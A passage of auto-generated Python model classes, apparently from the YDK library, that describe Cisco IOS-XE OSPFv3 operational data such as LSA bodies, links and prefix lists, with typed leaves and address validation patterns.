**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
"""
OSPFv3 Link data
.. attribute:: rtr_priority
Router priority of the interce
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_local_interface_address
The originating router's link\-local interface address on the link
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_id_options
Link data LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
"""
OSPFv3 Intra area prefixes
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_adv_router
Referenced Advertising Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: num_of_prefixes
Number of prefixes
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
"""
OSPFv3 links
.. attribute:: interface_id (key)
Interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_interface_id (key)
Neighbor interface ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: neighbor_router_id (key)
Neighbor router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: metric
Metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3PrefixList(Entity):
"""
OSPFv3 prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
self.yang_name = "ospfv3-prefix-list"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
"""
OSPFv3 intra\-area prefix\-list
.. attribute:: prefix (key)
Prefix
**type**\: str
**config**\: False
.. attribute:: prefix_options
Prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
"""
OSPF multi\-topology interface augmentation
.. attribute:: name (key)
One of the topology enabled on this interface
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
